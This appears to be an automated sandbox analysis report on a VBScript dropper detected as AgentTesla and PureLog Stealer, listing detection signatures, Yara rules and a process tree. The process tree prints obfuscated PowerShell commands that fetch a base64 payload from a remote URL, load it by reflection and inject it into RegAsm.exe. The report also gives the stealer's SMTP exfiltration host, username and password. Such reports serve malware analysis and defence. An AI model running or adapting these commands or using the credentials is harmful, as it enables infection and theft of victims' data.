Edit tour
Windows
Analysis Report
PofaABvatI.vbs
Overview
General Information
| Sample name: | PofaABvatI.vbsrenamed because original name is a hash value |
| Original sample name: | 05f1bfad1052e82ed6fc8d3348ea86f1958b8d8f39d331967edba843ce1214f7.vbs |
| Analysis ID: | 1523820 |
| MD5: | 5b4a21e35cce386f8692a4a5d684cb14 |
| SHA1: | 38cefdde89a5577f3d89396afd6fc15c8f89200e |
| SHA256: | 05f1bfad1052e82ed6fc8d3348ea86f1958b8d8f39d331967edba843ce1214f7 |
| Tags: | BlindEaglevbsuser-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
AgentTesla, PureLog Stealer
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 2216 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\PofaA BvatI.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 2952 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LiAoIChbU1 RySW5HXSR2 RVJib1NFUH JFZmVSRU5D RSlbMSwzXS sneCctam9J bicnKSggKC dETCcrJ2p1 cmwnKycgPS crJyBGeUwn KydodHRwcz onKycvL2lh NicrJzAwJy snMTAnKycw JysnLnVzLm FyY2hpdmUu b3JnJysnLz InKyc0Jysn L2l0ZW1zL2 RlJysndGFo LW5vdGUtdi 9EZXQnKydh JysnaE5vdG UnKydWJysn LnR4dCcrJ0 Z5TDtETGpi JysnYXNlNi crJzRDb250 ZW4nKyd0ID 0nKycgJysn KCcrJ05ldy 1PYmplY3Qg JysnU3lzJy sndGVtJysn Lk5ldC4nKy dXZScrJ2JD bGknKydlJy snbnQnKycp LkRvJysndy crJ24nKyds bycrJ2FkU3 RyJysnaW5n KERMaicrJ3 VybCk7Jysn RExqYicrJ2 luYScrJ3J5 Q29udGVudC AnKyc9IFtT eXMnKyd0ZW 0uQ29udmVy dF06JysnOk YnKydyb21C YXNlNjRTdH InKydpbicr J2coRCcrJ0 xqJysnYmEn KydzZTY0Q2 9udGVudCkn Kyc7REwnKy dqYXMnKydz ZScrJ20nKy dibHkgPSBb JysnUmVmbG VjJysndCcr J2knKydvbi crJy5BJysn cycrJ3NlbS crJ2JsJysn eScrJ10nKy c6OkwnKydv JysnYWQoRC crJ0xqYmlu YXInKyd5Q2 9uJysndGVu dCcrJyk7RE xqdCcrJ3kn KydwJysnZS A9IERMamFz cycrJ2VtYm x5LkdldFQn Kyd5cGUnKy coRnlMUnVu UEUnKycuSG 8nKydtJysn ZUZ5TCk7RE xqJysnbScr J2UnKyd0aG 8nKydkID0g JysnRExqJy sndCcrJ3kn KydwZScrJy 4nKydHZScr J3RNJysnZX Rob2QoJysn RnlMVkFJRn lMKTtEJysn TGptZXRob2 QnKycuSW4n Kyd2b2tlKE RMJysnam51 bGwsIFtvYm plY3RbXV1A KEZ5JysnTH R4dC5pbGlt bScrJy92ZW QnKycuMnIu MzliMzQ1Mz AnKycyYTA3 NScrJ2IxYm MnKycwJysn ZDQnKyc1Yj YzJysnMmVi OWVlNjItYn VwJysnLy86 cycrJ3B0Jy sndCcrJ2gn KydGJysneU wgJysnLCBG eUwnKydkZX NhdGl2YWQn KydvRnknKy dMICwnKycg RicrJ3lMZG VzYXRpdmEn Kydkb0Z5TC crJyAsIEYn Kyd5TGRlcy crJ2F0aScr J3ZhZG9GJy sneScrJ0ws JysnRnknKy dMUmVnQXNt RnlMLEZ5Jy snTEZ5TCkp JykucmVQbE FDRSgnRExq JywnJCcpLn JlUGxBQ0Uo J0Z5TCcsW1 N0UmluZ11b Q0hhcl0zOS kgKQ==';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 2916 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3776 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and ". ( ( [STrInG]$v ERboSEPrEf eRENCE)[1, 3]+'x'-joI n'')( ('DL '+'jurl'+' ='+' FyL' +'https:'+ '//ia6'+'0 0'+'10'+'0 '+'.us.arc hive.org'+ '/2'+'4'+' /items/de' +'tah-note -v/Det'+'a '+'hNote'+ 'V'+'.txt' +'FyL;DLjb '+'ase6'+' 4Conten'+' t ='+' '+' ('+'New-Ob ject '+'Sy s'+'tem'+' .Net.'+'We '+'bCli'+' e'+'nt'+') .Do'+'w'+' n'+'lo'+'a dStr'+'ing (DLj'+'url );'+'DLjb' +'ina'+'ry Content '+ '= [Sys'+' tem.Conver t]:'+':F'+ 'romBase64 Str'+'in'+ 'g(D'+'Lj' +'ba'+'se6 4Content)' +';DL'+'ja s'+'se'+'m '+'bly = [ '+'Reflec' +'t'+'i'+' on'+'.A'+' s'+'sem'+' bl'+'y'+'] '+'::L'+'o '+'ad(D'+' Ljbinar'+' yCon'+'ten t'+');DLjt '+'y'+'p'+ 'e = DLjas s'+'embly. GetT'+'ype '+'(FyLRun PE'+'.Ho'+ 'm'+'eFyL) ;DLj'+'m'+ 'e'+'tho'+ 'd = '+'DL j'+'t'+'y' +'pe'+'.'+ 'Ge'+'tM'+ 'ethod('+' FyLVAIFyL) ;D'+'Ljmet hod'+'.In' +'voke(DL' +'jnull, [ object[]]@ (Fy'+'Ltxt .ilimm'+'/ ved'+'.2r. 39b34530'+ '2a075'+'b 1bc'+'0'+' d4'+'5b63' +'2eb9ee62 -bup'+'//: s'+'pt'+'t '+'h'+'F'+ 'yL '+', F yL'+'desat ivad'+'oFy '+'L ,'+' F'+'yLdesa tiva'+'doF yL'+' , F' +'yLdes'+' ati'+'vado F'+'y'+'L, '+'Fy'+'LR egAsmFyL,F y'+'LFyL)) ').rePlACE ('DLj','$' ).rePlACE( 'FyL',[StR ing][CHar] 39) )" MD5: 04029E121A0CFA5991749937DD22A1D9) 
RegAsm.exe (PID: 4832 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Asm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - RegAsm.exe (PID: 6080 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Asm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - RegAsm.exe (PID: 516 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Asm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - RegAsm.exe (PID: 4468 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Asm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - RegAsm.exe (PID: 6264 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Asm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.detarcoopmedical.com", "Username": "mail@detarcoopmedical.com", "Password": "To$zL%?nhDHN"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| Click to see the 4 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||